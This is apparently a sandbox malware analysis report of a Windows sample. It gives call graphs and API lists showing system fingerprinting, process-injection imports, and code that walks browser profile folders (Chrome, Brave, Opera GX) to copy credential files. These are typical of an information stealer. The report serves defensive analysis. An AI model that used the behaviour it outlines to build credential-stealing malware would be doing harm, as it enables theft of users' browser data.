31563 7 API calls 74793->75574 74796 305c7 2 API calls 74797 340a6 74796->74797 74798 3058d lstrcpyA 74797->74798 74799 340ae 74798->74799 74800 30609 3 API calls 74799->74800 74801 340ce 74800->74801 74802 3058d lstrcpyA 74801->74802 74803 340d6 74802->74803 74804 30609 3 API calls 74803->74804 74805 340ee 74804->74805 74806 3058d lstrcpyA 74805->74806 74807 340f6 74806->74807 75577 30ddb 74807->75577 74810 305c7 2 API calls 74811 34113 74810->74811 74812 3058d lstrcpyA 74811->74812 74813 3411b 74812->74813 74814 30609 3 API calls 74813->74814 74815 3413b 74814->74815 74816 3058d lstrcpyA 74815->74816 74817 34143 74816->74817 74818 30609 3 API calls 74817->74818 74819 3415b 74818->74819 74820 3058d lstrcpyA 74819->74820 74821 34163 74820->74821 74822 30cc0 9 API calls 74821->74822 74823 34170 74822->74823 74824 30609 3 API calls 74823->74824 74825 3417c 74824->74825 74826 3058d lstrcpyA 74825->74826 74827 34184 74826->74827 74828 30609 3 API calls 74827->74828 74829 3419c 74828->74829 74830 3058d lstrcpyA 74829->74830 74831 341a4 74830->74831 74832 30609 3 API calls 74831->74832 74833 341bc 74832->74833 74834 3058d lstrcpyA 74833->74834 74835 341c4 74834->74835 75589 30d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 74835->75589 74838 30609 3 API calls 74839 341dd 74838->74839 74840 3058d lstrcpyA 74839->74840 74841 341e5 74840->74841 74842 30609 3 API calls 74841->74842 74843 341fd 74842->74843 74844 3058d lstrcpyA 74843->74844 74845 34205 74844->74845 74846 30609 3 API calls 74845->74846 74847 3421d 74846->74847 74848 3058d lstrcpyA 74847->74848 74849 34225 74848->74849 74850 30609 3 API calls 74849->74850 74851 3423d 74850->74851 74852 3058d lstrcpyA 74851->74852 74853 34245 74852->74853 75594 30f51 GetProcessHeap HeapAlloc RegOpenKeyExA 74853->75594 74855 34252 74856 30609 3 API calls 74855->74856 74857 3425e 74856->74857 74858 3058d lstrcpyA 74857->74858 74859 34266 74858->74859 74860 30609 3 API calls 74859->74860 74861 3427e 74860->74861 74862 3058d lstrcpyA 74861->74862 74863 34286 74862->74863 74864 30609 3 API calls 74863->74864 74865 3429e 74864->74865 74866 3058d lstrcpyA 74865->74866 74867 342a6 74866->74867 75597 31007 74867->75597 74870 30609 3 API calls 74871 342bf 74870->74871 74872 3058d lstrcpyA 74871->74872 74873 342c7 74872->74873 74874 30609 3 API calls 74873->74874 74875 342df 74874->74875 74876 3058d lstrcpyA 74875->74876 74877 342e7 74876->74877 74878 30609 3 API calls 74877->74878 74879 342ff 74878->74879 74880 3058d lstrcpyA 74879->74880 74881 34307 74880->74881 75614 30fba GetSystemInfo wsprintfA 74881->75614 74884 30609 3 API calls 74885 34320 74884->74885 74886 3058d lstrcpyA 74885->74886 74887 34328 74886->74887 74888 30609 3 API calls 74887->74888 74889 34340 74888->74889 74890 3058d lstrcpyA 74889->74890 74891 34348 74890->74891 74892 30609 3 API calls 74891->74892 74893 34360 74892->74893 74894 3058d lstrcpyA 74893->74894 74895 34368 74894->74895 75617 31119 GetProcessHeap HeapAlloc 74895->75617 74898 30609 3 API calls 74899 34381 74898->74899 74900 3058d lstrcpyA 74899->74900 74901 34389 74900->74901 74902 30609 3 API calls 74901->74902 74903 343a4 74902->74903 74904 3058d lstrcpyA 74903->74904 74905 343ac 74904->74905 74906 30609 3 API calls 74905->74906 74907 343c7 74906->74907 74908 3058d lstrcpyA 74907->74908 74909 343cf 74908->74909 75624 31192 74909->75624 74912 305c7 2 API calls 74913 343ef 74912->74913 74914 3058d lstrcpyA 74913->74914 74915 343f7 74914->74915 74916 30609 3 API calls 74915->74916 74917 3441a 74916->74917 74918 3058d lstrcpyA 74917->74918 74919 34422 74918->74919 74920 30609 3 API calls 74919->74920 74921 3443a 74920->74921 74922 3058d lstrcpyA 74921->74922 74923 34442 74922->74923 75631 314a5 74923->75631 74926 305c7 2 API calls 74927 34462 74926->74927 74928 3058d lstrcpyA 74927->74928 74929 3446a 74928->74929 74930 30609 3 API calls 74929->74930 74931 34490 74930->74931 74932 3058d lstrcpyA 74931->74932 74933 34498 74932->74933 74934 30609 3 API calls 74933->74934 74935 344b3 74934->74935 74936 3058d lstrcpyA 74935->74936 74937 344bb 74936->74937 75641 31203 74937->75641 74940 305c7 2 API calls 74941 344e0 74940->74941 74942 3058d lstrcpyA 74941->74942 74943 344e8 74942->74943 74944 31203 21 API calls 74943->74944 74945 34509 74944->74945 74946 305c7 2 API calls 74945->74946 74947 34518 74946->74947 74948 3058d lstrcpyA 74947->74948 74949 34520 74948->74949 74950 30609 3 API calls 74949->74950 74951 34543 74950->74951 74952 3058d lstrcpyA 74951->74952 74953 3454b 74952->74953 74954 21cfd lstrcpyA 74953->74954 74955 34560 lstrlenA 74954->74955 74956 304e7 lstrcpyA 74955->74956 74957 3457d 74956->74957 75661 36e97 74957->75661 75463->74151 75465 3d016 __crtGetStringTypeA_stat 5 API calls 75464->75465 75466 32601 75465->75466 75466->73368 75466->73373 75468 304e7 lstrcpyA 75467->75468 75469 22a05 75468->75469 75469->74220 75471 304e7 lstrcpyA 75470->75471 75472 22a16 75471->75472 75472->74220 75474 304e7 lstrcpyA 75473->75474 75475 22a27 75474->75475 75475->74220 75477 30519 lstrcpyA 75476->75477 75478 36dac 75477->75478 75479 30519 lstrcpyA 75478->75479 75480 36db7 75479->75480 75481 30519 lstrcpyA 75480->75481 75482 36dc2 75481->75482 75482->74253 75483->74220 75484->74220 75485->74220 75487 316ad 75486->75487 75488 3173c 75486->75488 75490 304e7 lstrcpyA 75487->75490 75489 304e7 lstrcpyA 75488->75489 75491 31748 75489->75491 75492 316c0 _memset 75490->75492 75493 3d016 __crtGetStringTypeA_stat 5 API calls 75491->75493 75503 323d5 lstrcpyA malloc strncpy 75492->75503 75494 31755 75493->75494 75494->74275 75496 316ea lstrcatA 75504 22920 75496->75504 75498 31707 lstrcatA 75499 31724 75498->75499 75500 304e7 lstrcpyA 75499->75500 75501 31732 75500->75501 75501->75491 75502->74277 75503->75496 75505 22924 75504->75505 75505->75498 75507 24ac4 75506->75507 75507->75507 75508 24acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 75507->75508 75509 24b27 75508->75509 75509->74287 75511 47068 75510->75511 75511->74592 75511->75511 75513 2806a LocalAlloc 75512->75513 75514 26724 75512->75514 75513->75514 75515 2807a CryptStringToBinaryA 75513->75515 75514->74455 75514->74467 75515->75514 75516 28091 LocalFree 75515->75516 75516->75514 75518 3d016 __crtGetStringTypeA_stat 5 API calls 75517->75518 75519 30d2c 75518->75519 75519->74647 75678 43c10 75520->75678 75523 31651 RegCloseKey CharToOemA 75525 3d016 __crtGetStringTypeA_stat 5 API calls 75523->75525 75524 31630 RegQueryValueExA 75524->75523 75526 31682 75525->75526 75526->74661 75528 32294 75527->75528 75529 32278 K32GetModuleFileNameExA CloseHandle 75527->75529 75530 304e7 lstrcpyA 75528->75530 75529->75528 75531 322a0 75530->75531 75532 3d016 __crtGetStringTypeA_stat 5 API calls 75531->75532 75533 322ae 75532->75533 75533->74704 75680 30c16 75534->75680 75537 30b63 RegOpenKeyExA 75539 30b83 RegQueryValueExA 75537->75539 75540 30b9b RegCloseKey 75537->75540 75538 30b5c 75538->74726 75539->75540 75540->75538 75687 4f109 75541->75687 75543 31813 CoInitializeEx CoInitializeSecurity CoCreateInstance 75544 3186b 75543->75544 75545 31873 CoSetProxyBlanket 75544->75545 75548 31964 75544->75548 75551 318a3 75545->75551 75546 304e7 lstrcpyA 75547 3198f 75546->75547 75549 4f165 5 API calls 75547->75549 75548->75546 75550 31996 75549->75550 75550->74740 75551->75548 75552 318d7 VariantInit 75551->75552 75553 318f6 75552->75553 75688 31757 75553->75688 75555 31901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 75556 304e7 lstrcpyA 75555->75556 75557 31958 VariantClear 75556->75557 75557->75547 75697 4f09d 75558->75697 75560 319a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 75561 319f9 75560->75561 75562 31a01 CoSetProxyBlanket 75561->75562 75566 31a93 75561->75566 75563 31a31 75562->75563 75563->75566 75567 31a59 VariantInit 75563->75567 75564 304e7 lstrcpyA 75565 31abe 75564->75565 75565->74753 75566->75564 75568 31a78 75567->75568 75698 31d42 LocalAlloc CharToOemW 75568->75698 75570 31a80 75571 304e7 lstrcpyA 75570->75571 75572 31a87 VariantClear 75571->75572 75572->75565 75573->74781 75575 304e7 lstrcpyA 75574->75575 75576 315cd 75575->75576 75576->74796 75578 304e7 lstrcpyA 75577->75578 75579 30e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 75578->75579 75580 30eed 75579->75580 75588 30e3c 75579->75588 75582 30f05 75580->75582 75583 30ef9 LocalFree 75580->75583 75581 30e42 GetLocaleInfoA 75581->75588 75584 3d016 __crtGetStringTypeA_stat 5 API calls 75582->75584 75583->75582 75585 30f15 75584->75585 75585->74810 75586 3058d lstrcpyA 75586->75588 75587 30609 lstrlenA lstrcpyA lstrcatA 75587->75588 75588->75580 75588->75581 75588->75586 75588->75587 75590 30d86 75589->75590 75591 30d6a wsprintfA 75589->75591 75592 3d016 __crtGetStringTypeA_stat 5 API calls 75590->75592 75591->75590 75593 30d93 75592->75593 75593->74838 75595 30f94 RegQueryValueExA 75594->75595 75596 30fac RegCloseKey 75594->75596 75595->75596 75596->74855 75598 3107c GetLogicalProcessorInformationEx 75597->75598 75599 31087 75598->75599 75600 31048 GetLastError 75598->75600 75701 31b5b GetProcessHeap HeapFree 75599->75701 75601 31057 75600->75601 75603 310f3 75600->75603 75611 3105b 75601->75611 75604 310fd 75603->75604 75702 31b5b GetProcessHeap HeapFree 75603->75702 75609 3d016 __crtGetStringTypeA_stat 5 API calls 75604->75609 75605 310c0 75605->75604 75610 310c9 wsprintfA 75605->75610 75613 31117 75609->75613 75610->75604 75611->75598 75612 310ec 75611->75612 75699 31b5b GetProcessHeap HeapFree 75611->75699 75700 31b78 GetProcessHeap HeapAlloc 75611->75700 75612->75604 75613->74870 75615 3d016 __crtGetStringTypeA_stat 5 API calls 75614->75615 75616 31005 75615->75616 75616->74884 75703 31b26 75617->75703 75620 3115f wsprintfA 75622 3d016 __crtGetStringTypeA_stat 5 API calls 75620->75622 75623 31190 75622->75623 75623->74898 75625 304e7 lstrcpyA 75624->75625 75627 311b3 75625->75627 75626 311f3 75629 3d016 __crtGetStringTypeA_stat 5 API calls 75626->75629 75627->75626 75628 30549 2 API calls 75627->75628 75628->75627 75630 31201 75629->75630 75630->74912 75632 304e7 lstrcpyA 75631->75632 75633 314c6 CreateToolhelp32Snapshot Process32First 75632->75633 75634 3154c CloseHandle 75633->75634 75639 314ee 75633->75639 75636 3d016 __crtGetStringTypeA_stat 5 API calls 75634->75636 75635 3153a Process32Next 75635->75634 75635->75639 75637 31561 75636->75637 75637->74926 75638 30609 lstrlenA lstrcpyA lstrcatA 75638->75639 75639->75635 75639->75638 75640 3058d lstrcpyA 75639->75640 75640->75639 75642 304e7 lstrcpyA 75641->75642 75643 3123b RegOpenKeyExA 75642->75643 75644 31478 75643->75644 75660 31281 75643->75660 75646 30519 lstrcpyA 75644->75646 75645 31287 RegEnumKeyExA 75647 312c4 wsprintfA RegOpenKeyExA 75645->75647 75645->75660 75648 31489 75646->75648 75650 31460 RegCloseKey 75647->75650 75651 3130a RegQueryValueExA 75647->75651 75655 3d016 __crtGetStringTypeA_stat 5 API calls 75648->75655 75649 3145e 75652 3146c RegCloseKey 75649->75652 75650->75652 75653 31440 RegCloseKey 75651->75653 75654 31340 lstrlenA 75651->75654 75652->75644 75653->75660 75654->75653 75654->75660 75657 314a3 75655->75657 75656 30609 lstrlenA lstrcpyA lstrcatA 75656->75660 75657->74940 75658 313b0 RegQueryValueExA 75658->75653 75658->75660 75659 3058d lstrcpyA 75659->75660 75660->75645 75660->75649 75660->75653 75660->75656 75660->75658 75660->75659 75662 36ea7 75661->75662 75663 3058d lstrcpyA 75662->75663 75664 36ec4 75663->75664 75665 3058d lstrcpyA 75664->75665 75679 3160c RegOpenKeyExA 75678->75679 75679->75523 75679->75524 75683 30ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 75680->75683 75682 30b58 75682->75537 75682->75538 75684 30c03 RegCloseKey 75683->75684 75685 30bec RegQueryValueExA 75683->75685 75686 30c13 75684->75686 75685->75684 75686->75682 75687->75543 75696 4f09d 75688->75696 75690 31763 CoCreateInstance 75691 3178b SysAllocString 75690->75691 75693 317e7 75690->75693 75692 3179a 75691->75692 75691->75693 75694 317e0 SysFreeString 75692->75694 75695 317be _wtoi64 SysFreeString 75692->75695 75693->75555 75694->75693 75695->75694 75696->75690 75697->75560 75698->75570 75699->75611 75700->75611 75701->75605 75702->75604 75704 3114d GlobalMemoryStatusEx 75703->75704 75704->75620 77334 3848d 77335 38494 77334->77335 77336 3d016 __crtGetStringTypeA_stat 5 API calls 77335->77336 77337 384a9 77336->77337

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00038950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                          • API String ID: 2238633743-2740034357
                                                                                                                                                                                          • Opcode ID: 3abcc6c720c6c208763e345d57394dd18d56fe6bd5a9cbe55ee3d37fb3fb66a7
                                                                                                                                                                                          • Instruction ID: 4af38d165ddb8b67c24a707c5fd6ecb76360a4a52b5657ee9f1c8b9be8a850c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3abcc6c720c6c208763e345d57394dd18d56fe6bd5a9cbe55ee3d37fb3fb66a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE52F575801216AFEF129F60FD2D8243BB6F71D60935788A5E90D96270E73248E4EF36
                                                                                                                                                                                          Function 00034CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00034D1C
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00034D33
                                                                                                                                                                                          • _memset.LIBCMT ref: 00034D4F
                                                                                                                                                                                          • _memset.LIBCMT ref: 00034D60
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000569F8), ref: 00034D81
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000569FC), ref: 00034D9B
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00034DC2
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005660F), ref: 00034DD6
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00034DFF
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00034E16
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • _memset.LIBCMT ref: 00034E28
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00034E3D
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00034E82
                                                                                                                                                                                          • _memset.LIBCMT ref: 00034E94
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00034EA9
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00034EC2
                                                                                                                                                                                          • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00034ED7
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00056A28,0005661D), ref: 00034F90
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00034FA0
                                                                                                                                                                                            • Part of subcall function 00032166: CreateFileA.KERNEL32(00034FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00034FAC,?), ref: 00032181
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00034FB6
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00034FC1
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00034FE7
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 00035105
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00035125
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                          • API String ID: 956187361-332874205
                                                                                                                                                                                          • Opcode ID: a7dabdfad92583f61ecabe8ef5e6b0d17a3605d44d031f034825ff01882c2be8
                                                                                                                                                                                          • Instruction ID: 59e91f4e12380f75a0933befdf33c74c524607406ab3d4a4b3d2bdfa86a932d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7dabdfad92583f61ecabe8ef5e6b0d17a3605d44d031f034825ff01882c2be8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 36C11DB1D0022AABDF22AB60EC499EE777CAF08305F4145E5FA09B7151DB319F858F61
                                                                                                                                                                                          Function 00029D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1437 29d1c-29dd5 call 304e7 call 305c7 call 30609 call 3058d call 22920 * 2 call 304e7 * 2 FindFirstFileA 1454 29ddb-29def StrCmpCA 1437->1454 1455 2a788-2a7d7 call 22920 * 3 call 21cde call 22920 * 3 call 3d016 1437->1455 1457 2a761-2a776 FindNextFileA 1454->1457 1458 29df5-29e09 StrCmpCA 1454->1458 1457->1454 1460 2a77c-2a782 FindClose 1457->1460 1458->1457 1459 29e0f-29e85 call 30549 call 305c7 call 30609 * 2 call 3058d call 22920 * 3 1458->1459 1492 29e8b-29ea1 StrCmpCA 1459->1492 1493 29f8e-2a002 call 30609 * 4 call 3058d call 22920 * 3 1459->1493 1460->1455 1494 29ea3-29f13 call 30609 * 4 call 3058d call 22920 * 3 1492->1494 1495 29f18-29f8c call 30609 * 4 call 3058d call 22920 * 3 1492->1495 1544 2a008-2a01d call 22920 StrCmpCA 1493->1544 1494->1544 1495->1544 1547 2a023-2a037 StrCmpCA 1544->1547 1548 2a1ef-2a204 StrCmpCA 1544->1548 1547->1548 1551 2a03d-2a173 call 304e7 call 31c4a call 30609 call 305c7 call 30609 call 305c7 call 3058d call 22920 * 5 CopyFileA call 304e7 call 30609 * 2 call 3058d call 22920 * 2 call 30519 call 27fac 1547->1551 1549 2a206-2a249 call 21cfd call 30519 * 3 call 2852e 1548->1549 1550 2a259-2a26e StrCmpCA 1548->1550 1612 2a24e-2a254 1549->1612 1554 2a270-2a281 StrCmpCA 1550->1554 1555 2a2cf-2a2e9 call 30519 call 31d92 1550->1555 1733 2a175-2a1b3 call 21cfd call 30519 call 36e97 call 22920 1551->1733 1734 2a1b8-2a1ea DeleteFileA call 22920 * 3 1551->1734 1559 2a6d0-2a6d7 1554->1559 1560 2a287-2a28b 1554->1560 1582 2a2eb-2a2ef 1555->1582 1583 2a34f-2a364 StrCmpCA 1555->1583 1563 2a731-2a75b call 22920 * 2 1559->1563 1564 2a6d9-2a726 call 21cfd call 30519 * 2 call 304e7 call 29d1c 1559->1564 1560->1559 1566 2a291-2a2cd call 21cfd call 30519 * 2 1560->1566 1563->1457 1628 2a72b 1564->1628 1610 2a335-2a33f call 30519 call 2884c 1566->1610 1582->1559 1592 2a2f5-2a32f call 21cfd call 30519 call 304e7 1582->1592 1589 2a546-2a55b StrCmpCA 1583->1589 1590 2a36a-2a426 call 304e7 call 31c4a call 30609 call 305c7 call 30609 call 305c7 call 3058d call 22920 * 5 CopyFileA 1583->1590 1589->1559 1597 2a561-2a61d call 304e7 call 31c4a call 30609 call 305c7 call 30609 call 305c7 call 3058d call 22920 * 5 CopyFileA 1589->1597 1688 2a4b9-2a4c9 StrCmpCA 1590->1688 1689 2a42c-2a4b3 call 21cfd call 30519 * 3 call 28ddb call 21cfd call 30519 * 3 call 29549 1590->1689 1592->1610 1692 2a623-2a69e call 21cfd call 30519 * 3 call 29072 call 21cfd call 30519 * 3 call 292a7 1597->1692 1693 2a6a4-2a6b6 DeleteFileA call 22920 1597->1693 1635 2a344-2a34a 1610->1635 1612->1559 1628->1563 1635->1559 1695 2a4cb-2a516 call 21cfd call 30519 * 3 call 29a0e 1688->1695 1696 2a51c-2a52e DeleteFileA call 22920 1688->1696 1689->1688 1692->1693 1707 2a6bb-2a6c2 1693->1707 1695->1696 1706 2a533-2a541 1696->1706 1712 2a6c9-2a6cb call 22920 1706->1712 1707->1712 1712->1559 1733->1734 1734->1548
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,000567F2,000567EF,00057324,000567EE,?,?,?), ref: 00029DC6
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00057328), ref: 00029DE7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005732C), ref: 00029E01
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,00057330,?,000567F3), ref: 00029E93
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Brave,00057350,00057354,00057330,?,000567F3), ref: 0002A015
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0002A02F
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002A0EF
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002A1BE
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A1FC
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A266
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(0002CCE9), ref: 0002A279
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A35C
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002A41C
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0002A4C1
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002A522
                                                                                                                                                                                            • Part of subcall function 00028DDB: lstrlenA.KERNEL32(?), ref: 00028FD4
